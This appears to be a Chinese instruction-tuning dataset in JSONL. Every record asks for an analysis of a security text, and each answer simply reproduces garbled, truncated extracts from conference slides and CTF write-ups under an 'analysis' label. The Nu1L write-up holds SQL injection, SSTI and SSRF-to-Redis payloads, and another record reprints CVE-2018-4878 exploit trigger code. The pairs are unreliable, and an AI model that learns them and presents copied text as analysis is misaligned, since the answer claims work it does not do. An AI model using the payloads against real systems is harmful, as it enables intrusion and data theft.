{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ModSecurity实现waf ## 安装与使用 ``` # 操作系统Centos7 # 解决依赖环境 yum install gcc.x86_64 libxml2-devel.x86_64 httpd.x86_64 httpd-devel.x86_64 pcre2.x86_64 pcre2-devel.x86_64 -y # 安装mod_security yum install mod_security.x86_64 -y # 查看http 模块结果如图 httpd -M | grep security ``` ![modsecurity-waf-1](https://github.com/bloodzer0/ossa/raw/master/application-security/security-defense/img/modsecurity-waf-1.png) ``` # 启动服务 systemctl start httpd.service # mod_security配置文件 /etc/httpd/conf.d/mod_security.conf # 规则目录 /etc/httpd/modsecurity.d/activated_rules # 安装mod_security规则 yum -y install mod_security_crs # 查看规则 ``` ![modsecurity-waf-2](https://github.com/bloodzer0/ossa/raw/master/application-security/security-defense/img/modsecurity-waf-2.png) ``` # 测试urlhttp://10.10.10.5/<script> # 查看日志 tail -n 1 -f /etc/httpd/logs/error_log ``` ![modsecurity-waf-3](https://github.com/bloodzer0/ossa/raw/master/application-security/security-defense/img/modsecurity-waf-3.png) ``` # 查看模块日志 tail -f /var/log/httpd/modsec_audit.log ``` ![modsecurity-waf-4](https://github.com/bloodzer0/ossa/raw/master/application-security/security-defense/img/modsecurity-waf-4.png) ## ModSecurity控制台waf-fle [官网地址](http://www.waf-fle.org/) [在线测试地址](http://demo.waf-fle.org/waf-fle/) ``` 测试账号waffle-demo 测试密码waffle-demo ``` ## 参考资料 [owasp mod_security](https://github.com/SpiderLabs/owasp-modsecurity-crs)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAuto-adapting Stealth Communication Channels Daniel J. Burroughs University of Central Florida About myself  Assistant Professor at UCF  Research includes  Correlation of distributed network sensors  Law enforcement data sharing network Correlation of IDS/Sensors  Previous research project I worked on  Presented at DefCon 9 & 10  Used Bayesian Multiple Hypothesis Tracking to analyze reports from multiple IDS scattered throughout a large network  Attempt to determine if events being detected are related or not Escalation of the Situation  That got me thinking  How would you defeat such a system (if it worked)  How could you avoid detection  Not the detection of an attack, but the ongoing communication  Or, how could you secretly communicate on a network Heres the question  How do you communicate on a network without letting anyone know that you are doing it?  First thing to figure out  How do they detect what is going on?  IDS  Firewalls  Observers IDS  Two basic forms of detection  Anomaly and Signature  Signature Detection  Known attacks / events  Only way to avoid is to use an unknown method or an ever changing method  Anomaly detection  Doesnt detect misuse  detects unusual behavior  Only chance someone has at detecting an unknown attack / event Anomaly Detection Avoidance  If we use a random or changing communication channel, signature detection can be avoided  How do we avoid looking unusual?  Detection of the network baseline  First stage: Discover what the network looks like  What traffic is allowed?  What does normal traffic look like?  Do this passively Detection of Entropy in the Network  Some aspects of the network traffic are going to have a low entropy, other will have a high entropy  Information can best be hidden in a high entropy data stream  Lots of available channels  Timing  Checksums  All the other data in a packet Overall Concept  Detect existing network baseline conditions  What does normal look like?  Select potential communications channels  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nquota === 显示磁盘已使用的空间与限制 ## 补充说明 **quota命令** 用于显示用户或者工作组的磁盘配额信息输出信息包括磁盘使用和配额限制 ### 语法 ```shell quota(选项)(参数) ``` ### 选项 ```shell -g列出群组的磁盘空间限制 -q简明列表只列出超过限制的部分 -u列出用户的磁盘空间限制 -v显示该用户或群组在所有挂入系统的存储设备的空间限制 -V显示版本信息 ``` ### 参数 用户或者工作组指定要显示的用户或者工作组 ### 实例 我们可以限制某一群组所能使用的最大磁盘配额而且可以再限制某一使用者的最大磁盘配额 好比做一个收费的应用vip可以得到空间更大一些另外以 Link 的方式来使邮件可以作为限制的配额更改`/var/spool/mail` 这个路径不2需要重新再规划一个硬盘直接使用 Link 的方式指向 /home 或者其它已经做好的 quota 磁盘就可以这通常是用在原本规划不好但是却又不想要更动原有主机架构的情况中 要求Linux 主机里面主要针对 quser1 及 quser2 两个使用者来进行磁盘配额 且这两个使用者都是挂在 qgroup 组里面的每个使用者总共有 50MB 的磁盘空间 (不考虑 inode) 限制并且 soft limit 为 45 MB而宽限时间设定为 1 天 但是在一天之内必须要将多余的文件删除掉否则将无法使用剩下的空间 gquota 这个组考虑最大限额所以设定为 90 MB注意这样设置的好处是富有弹性好比现在的邮件服务那么多用户承诺给用户每人最大空间为数GB然而人们不可能每人都会使用那么大的空间所以邮件服务的总空间实际上肯定不是注册客户数乘以数GB否则这样得多大啊 ```shell [root@localhost ~]# groupadd qgroup [root@localhost ~]# useradd -m -g qgroup quser1 [root@localhost ~]# useradd -m -g qgroup quser2 [root@localhost ~]# passwd quser1 [root@localhost ~]# passwd quser2 [root@localhost ~]# df ===> 自己找一个合适的分区来做实验这里用/disk2 Filesystem 1K-blocks Used Available Use% Mounted on /dev/hda1 5952252 3193292 2451720 57% / /dev/hdb1 28267608 77904 26730604 1% /disk2 /dev/hda5 9492644 227252 8775412 3% /disk1 [root@localhost ~]# vi /etc/fstab LABEL=/ / ext3 defaults 1 1 LABEL=/disk1 /disk1 ext3 defaults 1 2 LABEL=/disk2 /disk2 ext3 defaults,usrquota,grpquota 1 2 /dev/hda3 swap swap defaults 0 0 ``` 注意多了`usrquota,grpquota`在`defaults,usrquota,grpquota`之间都没有空格务必正确书写这样就算加入了 quota 的磁盘格式了不过由于真正的 quota 在读取的时候是读取`/etc/mtab`这个文件的而该文件需要重新开机之后才能够以/etc/fstab 的新数据进行改写所以这个时候可以选择重新开机 (reboot) 重新`remount filesystem`来驱动设定值 ```shell [root@localhost ~]# umount /dev/hdb1 [root@localhost ~]# mount -a [root@localhost ~]# grep '/disk2' /etc/mtab /dev/hdb1 /disk2 ext3 rw,usrquota,grpquota 0 0 ``` 事实上也可以利用 mount 的 remount 功能 ```shell [root@localhost ~]# mount -o remount /disk2 ``` 这样就已经成功的将 filesystem 的 quota 功能加入 扫瞄磁盘的使用者使用状况并产生重要的 aquota.group 与 aquota.user ```shell [root@localhost ~]# quotacheck -avug quotacheck: Scanning /dev/hdb1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCredit Cards: Everything You have Ever Wanted to Know Robert hackajar Imhoff-Dousharm A brief History  1950 DinersClub  1958 American Express  1958 BankAmericard (Visa)  1966 MasterCard International (ICA)  1986 Discover Card Technology  Knuckle Buster's  Dial-Up Authorization Terminal  High Speed Leased Lines  Gateway Processor's  Co-op Leased Lines  Online API Gateways Marketing & Technology  Smart Cards  Virtual One Time Use Cards  Gift Cards  Secure Cards  Easy Pay RFID Cards Physical Fraud Features  Embossed Card Number  Card Vendors Logo  Card Vendors Hologram  Card Vendors Embossed Cursive Letter  First 4-digits non-embossed  Expiration Date  Magnetic Strip  Signature Panel  CVV2 Code Credit Card Magnet Data  2 Tracks used for credit cards  3rd Track used for meta data, non credit cards  Review of Tracks 1 & 2 Transaction Flow - Authorization  Initial Authorization  FEP Hand Off  Back End / Merchant Link  Issuing Bank Authorization  FEP Record Update  Terminal Signature Printout Transaction Flow - Settlement  Close Out Terminal  Send Closeout request to FEP  Send Totals, individual transactions, Totals  FEP Record Update  FEP Batch Close to Issuing Banks  Money is Settled to MSP  MSP Funds Merchant Data Storage  Grab ass with your personal data  Known sources of data storage  Possible sources data may be stored  Extent of Information Stored  High Risk Merchants (for information leakage)  Internet Merchants Questions & Answers  All questions accepted on topics covered from last three DefCon talks  Some topics NOT covered during main talk, reserved for you to ask here  Thank You for 3 great years of Credit Card Security Talks", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# shark on wire 1 Forensics, 150 points ## Description: > We found this packet capture. Recover the flag. ## Solution: A network capture was attached. ```console root@kali:/media/sf_CTFs/pico/shark_on_wire_1# tshark -r capture.pcap | head Running as user \"root\" and group \"root\". This could be dangerous. 1 0.000000 192.168.2.1  239.255.255.250 SSDP 216 M-SEARCH * HTTP/1.1 52688 1900 2 1.000498 192.168.2.1  239.255.255.250 SSDP 216 M-SEARCH * HTTP/1.1 52688 1900 3 2.001016 192.168.2.1  239.255.255.250 SSDP 216 M-SEARCH * HTTP/1.1 52688 1900 4 3.002419 192.168.2.1  239.255.255.250 SSDP 216 M-SEARCH * HTTP/1.1 52688 1900 5 14.589681 192.168.2.1  192.168.2.255 BROWSER 243 Local Master Announcement LAPTOP-HCSFMST7, Workstation, Server, NT Workstation, Potential Browser, Master Browser 138 138 6 21.094272 fe80::8dd3:64c9:4ef3:82a3  ff02::1:3 LLMNR 84 Standard query 0x724e A wpad 50462 5355 7 21.094285 192.168.2.1  224.0.0.252 LLMNR 64 Standard query 0x724e A wpad 50462 5355 8 21.506682 fe80::8dd3:64c9:4ef3:82a3  ff02::1:3 LLMNR 84 Standard query 0x724e A wpad 50462 5355 9 21.506697 192.168.2.1  224.0.0.252 LLMNR 64 Standard query 0x724e A wpad 50462 5355 10 35.861119 Vmware_b9:02:a9  Broadcast ARP 60 Who has 10.0.0.5? Tell 10.0.0.6 ``` The following command searches the UDP streams for the flag format: ```console root@kali:/media/sf_CTFs/pico/shark_on_wire_1# PCAP=capture.pcap; END=$(tshark -r $PCAP -T fields -e udp.stream | sort -n | tail -1); for ((i=0;i<=END;i++)); do tshark -r $PCAP -Y \"udp.stream eq $i\" -T fields -e data.text -o data.show_as_text:TRUE 2>/dev/null | tr -d '\\n' | grep \"picoCTF\"; if [ $? -eq 0 ]; then echo \"(Stream #$i)\"; fi; done Running as user \"root\" and group \"root\". This could be dangerous. picoCTF{StaT31355_636f6e6e} (Stream #6) picoCTF{N0t_a_fLag} (Stream #7) ``` The flag was found in the sixth stream.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCTF WriteUp By Nu1L Author:Nu1L CTF WriteUp By Nu1L WEB carefuleyes simpleflask ezflask sssrfme babyshop XWIKI say hello to the world PWN vmpwn sandbox card babyqemu Reverse PicCompress Checkin EasyRe Simulator WannaFlag InfaintRe Misc signin oldmodem trihistory crymisc RIG capture v for Vendetta GACTF FeedBack Crypto square babycrypto elgaml_rsa da Vinci after rsa ezAES what_r_the_noise WEB carefuleyes www.zip simpleflask ezflask admin.func_globalsadminpath http://149.28.226.175:10000/h4rdt0f1nd_9792uagcaca00qjaf XM Content-Disposition: form-data; name=\"upfile\"; filename=\"-1'union select 1,username,3,4,5 from user limit 0,1#.jpg\" oldname=0'union select 1,(select username from `user` where `privilege`='admin'),3,4,'5&newname=bbbbbbb qweqweqwe oldname=0'union select 1,(select password from `user` where `privilege`='admin'),3,4,'5&newname=bbbbbbb class XCTFGG{ private $method; private $args; public function __construct($method, $args) { $this->method = \"login\"; $this->args = array(\"username\"=>\"XM\",\"password\"=>\"qweqweqwe\"); } } {{app.__call__.__globals__[\"bui\".__add__(\"ltins\")]} name= {{app.__init__.__globals__[\"__bui\".__add__(\"ltins__\")].open(\"/fl\".__add__(\"ag\" )).read()}} HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 316 Server: Werkzeug/1.0.1 Python/2.7.18 http 302 redirect + sstiflag sssrfme srfredismodule get shellphpflaskflaskurllib3 crlf injectionredis babyshop .git init.phpclass \"\" storage sessionPHPSESSIDsessionlfi Date: Sat, 29 Aug 2020 02:20:36 GMT import flask from xxxx import flag app = flask.Flask(**name**) app.config['FLAG'] = flag @app.route('/') def index(): return open('app.txt').read() @app.route('/[path:hack](path:hack)') def hack(hack): return flask.render_template_string(hack) if **name** == '**main**': app.run(host='0.0.0.0',port=5000) http://121.36.199.21:10809/?url=http://u:p@127.0.0.1:6379@118.24.185.108/ http://121.36.199.21:10809/?url=http://u:p@127.0.0.1:5000@118.24.185.108/? url=http://127.0.0.1:6379/%250d%250aAUTH", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMouseJack: Injecting Keystrokes into Wireless Mice Marc Newlin / marc@bastille.net / @marcnewlin Marc Newlin Security Researcher @ Bastille Networks Agenda 1. Overview 2. Research Process 3. Protocols and Vulnerabilities 4. Vendor Responses 5. Demo 1. Overview Types of Vulnerabilities  Forced Device Pairing  Keystroke Sniffing  Unencrypted Keystroke Injection  Encrypted Keystroke Injection  Malicious Macro Programming  Denial of Service Affected Vendors  AmazonBasics  Anker  Dell  EagleTec  GE  Gigabyte  HDE  Hewlett-Packard  Insignia  Kensington  Lenovo  Logitech  Microsoft  RadioShack  ShhhMouse  Toshiba Related Work Thorsten Schroeder and Max Moser  Practical Exploitation of Modern Wireless Devices (KeyKeriki)  Research into XOR encrypted Microsoft wireless keyboards Travis Goodspeed  Promiscuity is the nRF24L01+s Duty  Research into nRF24L pseudo-promiscuous mode functionality Samy Kamkar  KeySweeper  Microsoft XOR encrypted wireless keyboard sniffer Common Transceivers  General purpose transceivers with proprietary protocols  Mouse/keyboard specific transceivers used as-is  All devices use 2.4GHz GFSK  Combination of protocol weaknesses and implementation flaws Nordic Semiconductor nRF24L  2.4GHz general purpose transceivers  250kbps, 1Mbps, 2Mbps data rates  0, 1, or 2 byte CRC  2400-2525MHz, 1MHz steps  XCVR only or 8051-based SoC nRF24L Family Shockburst and Enhanced Shockburst Texas Instruments CC254X  2.4GHz general purpose transceivers  Used in some Logitech keyboards and mice  Logitech firmware is OTA compatible with nRF24L based devices  All we care about is that they work like the nRF424L MOSART Semiconductor  Undocumented transceiver  Appears to have mouse/keyboard logic baked in  No encryption  Most common with second tier vendors Signia SGN6210  (Mostly) undocumented transceiver  General purpose transceiver  No encryption  Only found (by me) in Toshiba mice and keyboards GE Mystery Transceiver  Undocumented transceiver  No idea who makes this chip  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKUBERNETES中的异常活动检测 About me 0 1 @9ian1i 朱思宇 blue teamer入侵对抗业余安全开发阿里云融媒体安全 DEFCON Blue Team VillageBlack Hat Arsenal 演讲者 WatchAD  AD Security Intrusion Detection System crawlergo  A powerful browser crawler for web vulnerability scanners ??? - kubernetes abnormal activity detection and blocking system 开源安全项目 安全风险 安全防护 K8S安全风险与防护现状 0 2 Threat matrix for Kubernetes 0 3 K8S安全防护现状 *检测能力数据来自各家官方网站文档 https://docs.microsoft.com/en-us/azure/security-center/alerts-reference#alerts-k8scluster https://help.aliyun.com/document_detail/191144.html#title-seo-no0-8zv Alibaba Cloud Google Cloud Azure Cloud 0 AWS Cloud 0 7 云厂商 15 K8S集群异常活动检测项数量 具备相关能力的国外安全厂商 除了云厂商国内普遍对K8S安全防护关注不够还停留在基线加固阶段 04 检测与对抗 05 Architecture based of audit logs detection 0 6 UI User Interface CLI Co mman d Lin e in terface API Server Master AuditLog Logtail Agent MQ Threat Analytics Alerts for suspicious activities Node 1 Node 2 Node n 0 7 About k8s auditing *审计策略格式样例 k8s审计事件日志可记录访问API Server的所有请求配合审 计策略设置能记录请求与响应的详细数据 每个Master节点上的审计日志并不会相互同步需要收集所 有Master节点 它能记录下面三个关键问题  用户身份与授权信息  请求的操作与资源详情  请求的结果与响应 0 8 User Interface Master etcd API Server Control- manager scheduler ns default-token-xxxxx sa-token-xxxxx other-token-xxxxx Host Secrets Node Pod Pod Compromised container Web App Access API Server Master A Master B Master N API Server API Server API Server 负载 均衡 6443 8080 容器集群渗透工具 匿名登录尝试 集群信息探测 0 9 SA Suspicious Activity 通过对SA进行行为学习记录建立操作基线超出则告警 1 0 Honeypot Account ns Node Secrets default-token-xxxxx normal-sa-token-xxxxx fake-admin-token-xxxxx ... Pod A Pod B Host OS file: ~/.kube/kubeconfig 投放 蜜饵账户 ... 1 1 About k8s RBAC 1 2 Privilege Escalation  RBAC rolebinding/bind hacker API Server Create rolebinding auditing normalaccount cluster-admin role admin privileges account 1 3 Privilege Escalation  RBAC createpod and SA bind hacker createpod privilege create pod req API Server pod send token Get admin JWT token 1 4 Certificate Authentication = Golden Ticket ? UI User Interface K8S的重要认证几乎都依赖客户端证书机制三套CA证书与私钥是认证体系的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrevbhfyl? Ntnva? Ebg guvegrra? Whfg jung qb lbh gnxr zr sbe? QmFzZTY0PyBOb3cgeW91J3JlIGp1c3QgcmVhY2hpbmcuLi5UaGluZ3MgYX JlIG9ubHkgZXZlciBhcyBjb21wbGljYXRlZCBhcyB0aGV5IG5lZWQgdG8gYmU uICBCdXQgaWYgeW91IGdldCBzdHVjaywgd2hlbiB5b3UncmUgYmx1ZSwgd HJ5IHR1cm5pbmcgdXAgdGhlIGhlYXQuICBJdCB3aWxsIG1ha2UgeW91IHRo aW5rIHlvdSdyZSBvbiBhbiBpc2xhbmQsIGFuZCBoZXksIGF0IGxlYXN0IHRoZ W4geW91J2QgYmUgb24gYW4gaXNsYW5kLg==", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEF CON 24 4 August Las Vegas, USA ME & VULNEX Simon Roses Femerling  Founder & CEO, VULNEX www.vulnex.com  @simonroses  Former Microsoft, PwC, @Stake  US DARPA award to research on software security  Speaker: Black Hat, RSA, HITB, OWASP, SOURCE, AppSec, DeepSec, TECHNET  Blog: http://www.simonroses.com/  Youtube: https://www.youtube.com/channel/UC8KUXxTSEdWfpFzAydjEzyQ  CyberSecurity Startup  @vulnexsl  Professional Services & Training  Products: BinSecSweeper (Unified File Security Analysis) VULNEX DISCLAIMER & LICENSE  All Tools and resources are property of Microsoft and their authors  Non-affiliated with Microsoft WORKSHOP OBJECTIVES  What has Microsoft to offer?  How to improve our security posture for free!  Development and IT Security AGENDA 1. Introduction 2. Secure Development 3. IT Security 4. Conclusions 1. DEVELOPERS VS SYSADMINS VS ALL 1. FATAL ERROR 1. DEFENSE IN DEPTH 1. MEMO FROM BILL GATES  https://news.microsoft.com/2012/01 /11/memo-from-bill- gates/#sm.001he6hz618bod7bz7k10 g0w76fr0 1. MICROSOFT SDL  The Security Development Lifecycle (SDL) is a software development process that helps developers build more secure software and address security compliance requirements while reducing development cost  https://www.microsoft.com/en- us/SDL 1. MICROSOFT SDL 1. SDL: TRAINING  SDL Practice #1: Core Security Training This practice is a prerequisite for implementing the SDL. Foundational concepts for building better software include secure design, threat modeling, secure coding, security testing, and best practices surrounding privacy 1. SDL: REQUIREMENTS  SDL Practice #2: Establish Security and Privacy Requirements Defining and integrating security and privacy requirements early helps make it easier to identify key milestones and deliverables and minimize disruptions to plans and schedules.  SDL Practice #3: Create Quality Gates/Bug Bars Defining minimum acceptable levels of security and privacy quality at the start helps a team understand risks associate", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2018年浏览器脚本引擎零日漏洞 Elliot Cao Trend Micro 2019-05-30 Whoami  入行之前是电气工程师  2017年加入趋势科技  沙箱开发人员  2018年开始研究浏览器漏洞  专注于浏览器脚本引擎  Lei Cao (@elli0tn0phacker) 目录  2018年的浏览器零日漏洞  VBSEmulator  Chakra 2018年的浏览器零日漏洞 2018年的浏览器零日漏洞  Flash: CVE-2018-4878 CVE-2018-15982  VBScript: CVE-2018-8174 CVE-2018-8373  JScript: CVE-2018-8653 2018年的Flash零日漏洞  CVE-2018-4878 var psdk:PSDK = PSDK.pSDK; var psdk_dispatcher:PSDKEventDispatcher = psdk.createDispatcher(); this.mediaPlayer = psdk.createMediaPlayer(psdk_dispatcher); this.my_DRMListerner = new DRMOperationCompleteListener (); this.mediaPlayer.drmManager.initialize(this.my_DRMListerner); this.my_DRMListerner = null; try { new LocalConnection().connect(\"foo\"); new LocalConnection().connect(\"foo\"); } catch (e:Error) { my_DRMListerner_vuln = new DRMOperationCompleteListener (); } 2018年的Flash零日漏洞漏洞  CVE-2018-4878 创建一个对象 var psdk:PSDK = PSDK.pSDK; var psdk_dispatcher:PSDKEventDispatcher = psdk.createDispatcher(); this.mediaPlayer = psdk.createMediaPlayer(psdk_dispatcher); this.my_DRMListerner = new DRMOperationCompleteListener (); this.mediaPlayer.drmManager.initialize(this.my_DRMListerner); this.my_DRMListerner = null; try { new LocalConnection().connect(\"foo\"); new LocalConnection().connect(\"foo\"); } catch (e:Error) { my_DRMListerner_vuln = new DRMOperationCompleteListener (); } var psdk:PSDK = PSDK.pSDK; var psdk_dispatcher:PSDKEventDispatcher = psdk.createDispatcher(); this.mediaPlayer = psdk.createMediaPlayer(psdk_dispatcher); this.my_DRMListerner = new DRMOperationCompleteListener (); this.mediaPlayer.drmManager.initialize(this.my_DRMListerner); this.my_DRMListerner = null; try { new LocalConnection().connect(\"foo\"); new LocalConnection().connect(\"foo\"); } catch (e:Error) { my_DRMListerner_vuln = new DRMOperationCompleteListener (); } 2018年的Flash零日漏洞漏洞  CVE-2018-4878 释放对象 2018年的Flash零日漏洞漏洞  CVE-2018-4878 重用释放内存触发GC获得一个悬挂指针 my_DRMListerner_vuln var psdk:PSDK = PSDK.pSDK; var psdk_dispatcher:PSDKEventDispatcher = psdk.createDispatcher(); thi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCon 22, Las Vegas 2014 Abusing Software Defined Networks Gregory Pickett, CISSP, GCIA, GPEN Chicago, Illinois gregory.pickett@hellfiresecurity.com Hellfire Security Overview What is it? Exploiting it! Fixing it! Moving Forward Wrapping Up Modern Day Networks Vendor Dependent Difficult to scale Complex and Prone to Break Distributed and Often Inconsistent Configuration Uses inflexible and difficult to innovate protocols Unable to Consider Other Factors  And Good Luck If You Want To Change It! Enter  Software Defined Networking Separate the Control and Data Plane Forwarding Decisions Made By a Controller Switches and Routers Just Forward Packets Controllers Programmed with the Intelligence Full visibility of the Network Can consider the totality of the network before making any decision Enforce Granular Policy Enter  Software Defined Networking Switches Bare-Metal Only Any Vendor  Hardware or Software Solves Lots of Problems Less Expensive Hardware With BGP Maintenance Dry-Out Customer Egress Selection Better BGP Security Faster Convergence Granular Peering at IXPs Expands Our Capability Real-World Network Slicing of Flow Space Network and Server Load Balancing Security Dynamic Access Control Adaptive Traffic Monitoring Attack Detection and Mitigation Emerging Standards Old and Busted SNMP BGP Netconf LISP PCEP New Hotness OVSDB Openflow Introducing Openflow Establishes Elements Controller Secure Channel Forwarding Element Defines  Forwarding Process Messaging Format Introducing Openflow Forwarding Process Check Flow Table If Match Found, Execute Action If No Match, Send Packet to controller Update Flow Table Flow Tables Match/Action Entries 12 fields available for matching Wildcard matching available Introducing Openflow Leading Platforms Proprietary Cisco Application Policy Infrastructure Controller (APIC) Cisco Extensible Network Controller (XNC) HP Virtual Application Networks (VAN) SDN Controller IBM Programmable Network Controller Open-Source Nox/Pox Ryu Floo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# HappyCake Web, 15 points ## Description > Wish'em happy birthday! A link to a website was provided. ## Solution We visit the website and see a simple page with several birthday wishes, e.g.: ```html <div birthday=\"\"> <p subtitle=\"\">Happy cake, Nir!</p> <div info=\"\" row=\"\"> <p content=\"\">06/12/2019</p> <a tag=\"\" content=\"\" href=\"scripts/page/?Nadav\">@Nadav</a> </div> <p content=\"\">Happy cake, <a tag=\"\" content=\"\" href=\"scripts/page/?Nir\">@Nir</a>.</p> <p>We wish you the best of everything, including dogs and flags.</p> </div> ``` Clicking one of the '`@Name`' links brings us to the a profile page, e.g.: ```html <!DOCTYPE html> <!-- Copyright (c) 2019 Nadav Tasher https://github.com/NadavTasher/BaseTemplate/ --> <html lang=\"en\"> <head> <meta charset=\"UTF-8\"/> <meta name=\"description\" content=\"Info about Nadav\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=5, user-scalable=yes, minimal-ui\"/> <meta name=\"mobile-web-app-capable\" content=\"yes\"> <meta name=\"theme-color\" content=\"#dae4ed\"/> <meta name=\"apple-mobile-web-app-capable\" content=\"yes\"/> <meta name=\"apple-mobile-web-app-status-bar-style\" content=\"black-translucent\"/> <meta name=\"apple-mobile-web-app-title\" content=\"Happy Cake!\"/> <title>@Nadav</title> <noscript></noscript> <style> /** * Copyright (c) 2019 Nadav Tasher * https://github.com/NadavTasher/BaseTemplate/ **/ /* ... Irrelevant style code, removed ... */ </style> <script> /** * Copyright (c) 2019 Nadav Tasher * https://github.com/NadavTasher/BaseTemplate/ **/ /* ... Irrelevant Javascript code, removed... */ </script> <script> </script> </head> <body column> <p style=\"font-size: 6vh\">Developer pages</p> <p>Nadav's developer page</p><p>Full Web Stack, Android RE, Java, member of KAF</p> <a href=\"../../\">Back home</a> </body> </html> <!-- OK --> ``` Searching for common web vulnerabilities, nothing immediate seems to reveal itself. The source code for the base template, which is linked to from the comments, doesn't seem ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTim Hsu CHROOT.ORG PDF created with pdfFactory Pro trial version www.pdffactory.com 2008/7/25 2  HIT(Hacks In Taiwan)主辦人  網駭科技創辦人  資訊安全技術研究者同時也是 Linux 愛好者  專長於網路程式設計網路滲透測試駭客攻擊手法研究惡意程 式分析及嵌入式系統等  著作  Linux C 函式庫詳解辭典 (旗標)  The Wargame 駭客訓練基地 - 決戰台灣版(旗標) (與曾信田莊明 躍何弈甫等人合著) 2 PDF created with pdfFactory Pro trial version www.pdffactory.com  Malicious Document Introduction  How To Identify The Malicious Code In The Document  Static And Dynamic Analysis  To Identify Which Vulnerable  Demo PDF created with pdfFactory Pro trial version www.pdffactory.com  What Is Malicious Document?  Office Document/CHM/PDF  Other  RAR/ZIP/MDB/ PDF created with pdfFactory Pro trial version www.pdffactory.com ShellCode EXE/DLL Malicious Document EXE/DLL C:\\Windows\\System32\\ PDF created with pdfFactory Pro trial version www.pdffactory.com ShellCode EXE/DLL Malicious Document C:\\Windows\\System32\\ EXE/DLL DOC PDF created with pdfFactory Pro trial version www.pdffactory.com  Kernel32.DLL  Different Windows Version  Find kernel32.dll  PEB(Process Environment Block)  SEH(Structured Exception Handling)  TOPSTACK PDF created with pdfFactory Pro trial version www.pdffactory.com  PEB (Process Environment Block)  Every running process that can always be found at fs:[0x30] from within the process.  Works on: 95/98/ME/NT/2K/XP/2K3  mov eax, fs:[eax+0x30] PDF created with pdfFactory Pro trial version www.pdffactory.com  SEH(Structured Exception Handling)  Starts at local process address fs:0  Works on: 95/98/ME/NT/2K/XP/2K3  xor ecx, ecx  mov esi, fs:[ecx] PDF created with pdfFactory Pro trial version www.pdffactory.com  Uses Thread Environment Block (TEB) located at fs:0x18h as starting point  works on: NT/2K/XP/2K3  xor esi, esi  mov esi, fs:[esi + 0x18] PDF created with pdfFactory Pro trial version www.pdffactory.com  Anti-Virus Software  Signature  Typical opcode  PE/MZ Format œ MZ PDF created with pdfFactory Pro trial version www.pdffactory.com ShellCode Malicious Document EXE/DLL DECODER PDF created ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1590-006-收集目标组织网络信息-网络安全设备 ## 来自ATT&CK的描述 攻击者可能会事先收集攻击目标的网络安全设备信息网络安全设备的信息可能包括各种详细信息例如已部署的防火墙内容筛选器和代理/堡垒主机的存在和详细信息攻击者还可能针对地收集有关受害者的网络入侵检测系统NIDS或其他与防御性网络安全操作有关的设备的信息 攻击者可以通过不同的方式收集这些信息例如通过[主动扫描](https://contribute.knowledge.qihoo.net/detail/technique/T1595)或[钓鱼](https://contribute.knowledge.qihoo.net/detail/technique/T1598)网络安全设备信息也可能通过在线或其他可访问的数据集例如[搜索受害者拥有的网站](https://contribute.knowledge.qihoo.net/detail/technique/T1594)暴露给攻击者这些信息可能为如下活动提供可能性其他形式的侦察活动例如[搜索公开技术数据库](https://contribute.knowledge.qihoo.net/detail/technique/T1596)[搜索开放网站/域](https://contribute.knowledge.qihoo.net/detail/technique/T1593))建立运营资源例如[开发能力](https://contribute.knowledge.qihoo.net/detail/technique/T1587) [获取能力](https://contribute.knowledge.qihoo.net/detail/technique/T1588)或实现初始访问例如[外部远程服务](https://contribute.knowledge.qihoo.net/detail/technique/T1133) ## 测试案例 红队必备WEB蜜罐识别阻断插件 <https://www.freebuf.com/articles/web/246938.html> 公开的采购信息等 ## 检测日志 无法有效监测 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 无 ## 建议 许多此类活动的发生频率和误报率可能很高并且有可能发生在目标组织的可见性之外从而使防御者难以发现 检测工作可能集中在攻击者生命周期的相关阶段例如在首次访问期间 ## 关联TIP [[T1590-001-收集目标组织网络信息-域属性]] [[T1590-002-收集目标组织网络信息-DNS]] [[T1590-003-收集目标组织网络信息-网络信任关系]] [[T1590-004-收集目标组织网络信息-网络拓扑]] [[T1590-005-收集目标组织网络信息-IP地址]] ## 参考推荐 MITRE-ATT&CK-T1590-006 <https://attack.mitre.org/techniques/T1590/006/> 红队必备WEB蜜罐识别阻断插件 <https://www.freebuf.com/articles/web/246938.html>", "category": "text_analysis", "source": "security_papers"}
